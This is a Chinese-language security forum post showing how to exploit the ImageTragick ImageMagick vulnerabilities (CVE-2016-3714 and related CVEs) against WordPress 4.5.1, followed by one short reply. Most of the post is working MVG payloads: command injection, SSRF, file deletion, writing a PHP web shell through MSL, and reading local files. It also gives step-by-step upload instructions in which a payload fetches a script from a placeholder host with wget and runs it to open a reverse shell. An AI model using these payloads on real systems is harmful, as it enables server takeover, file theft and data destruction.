请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 617|回复: 1

[原创文章] ImageMagick CVE-2016-3714 for wordpress4.5.1

[复制链接]
  • TA的每日心情
    奋斗
    2016-12-20 16:02
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2016-12-16 16:59:25 | 显示全部楼层 |阅读模式
    先看官方给的payload。
    0x01:命令执行
    ---------------------------
    pushgraphic-context
    viewbox 0 0 640480
    fill'url(https://"|id; ")'
    popgraphic-context
    ---------------------------
    0x02:SSRF CVE-2016-3718
    ---------------------------
    pushgraphic-context
    viewbox 0 0 640480
    fill 'url(http://example.com/)'
    popgraphic-context
    ---------------------------
    0x03:delete CVE-2016-3715
    ---------------------------
    push graphic-context
    viewbox 0 0 640 480
    image over 0,0 0,0 'ephemeral:/tmp/delete.txt'
    popgraphic-context
    ---------------------------
    0x04:CVE-2016-3716 I/0读写
    file_move.mvg
    -=-=-=-=-=-=-=-=-
    push graphic-context
    viewbox 0 0 640 480
    image over 0,0 0,0 'msl:/tmp/msl.txt'
    popgraphic-context
    /tmp/msl.txt
    -=-=-=-=-=-=-=-=-
    <?xml version="1.0"encoding="UTF-8"?>
    <image>
    <read filename="/tmp/image.gif" />
    <write filename="/var/www/shell.php" />
    </image>
    0x05:CVE-2016-3717可以造成本地文件读取漏洞
    ---------------------------
    push graphic-context
    viewbox 0 0 640 480
    image over 0,0 0,0 'label:@/etc/hosts'
    pop graphic-context
    ---------------------------

    这里只给出wordpress的复现过程,个人认为除了wordpress的复现有点绕,其他都是非常简单的,上传即可反弹。

    #1

    先上传一个正常的图片,记录Copy as cURL for cmd(记录post_id)

    3.png

    然后上传payload,记录payload的post_id和nonce

    Payload内容为
    push graphic-context
    viewbox 0 0 640 480
    fill 'url(

                                   
    登录/注册后可看大图
    "|wgethttp://XXX.com/nc.py -O /tmp/nc.py && python /tmp/nc.py X.X.X.X4430")'
    pop graphic-context

    4.png



    然后把上面curl的post_id 和 nonce改成payload的postid和nonce的信息

    5.png

    然后把上面curl的post_id 和 nonce改成payload的postid和nonce的信息

    回车即可反弹shell

    6.png







    回复

    使用道具 举报

  • TA的每日心情

    2017-3-17 02:53
  • 签到天数: 97 天

    [LV.6]常住居民II

    发表于 2016-12-20 02:39:24 | 显示全部楼层
    我以为是最新的那个EXP,原来还是五月份的
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-3-29 05:37 , Processed in 0.222005 second(s), 39 queries .

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表